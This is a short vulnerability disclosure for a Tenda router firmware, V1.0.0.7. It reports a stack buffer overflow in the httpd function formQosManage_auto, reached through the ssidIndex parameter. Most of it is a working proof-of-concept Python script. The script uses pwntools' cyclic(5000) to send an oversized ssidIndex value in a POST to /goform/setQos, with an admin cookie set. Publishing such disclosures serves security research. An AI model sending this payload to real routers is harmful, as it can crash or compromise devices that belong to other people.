Vendor:https://www.tendacn.com/
Firmware:https://www.tenda.com.cn/download/detail-2986.html
V1.0.0.7(4456)
The following image displays the code for a stack buffer overflow vulnerability in the formQosManage_auto function of httpd. The value of the ssidIndex parameter will be concatenated to local variable var_54, which will cause stack buffer overflow.
import requests
from pwn import *
url = "http://192.168.0.1/goform/setQos"
payload = {
'ssidIndex': cyclic(5000),
'ssid': '2.4G',
'qosmode': '1'
}
headers = {
'Cookie':'w9v1_user=admin;'
}
requests.request("POST", url, data=payload, headers=headers)The vendor was contacted early about this disclosure but did not respond in any way.
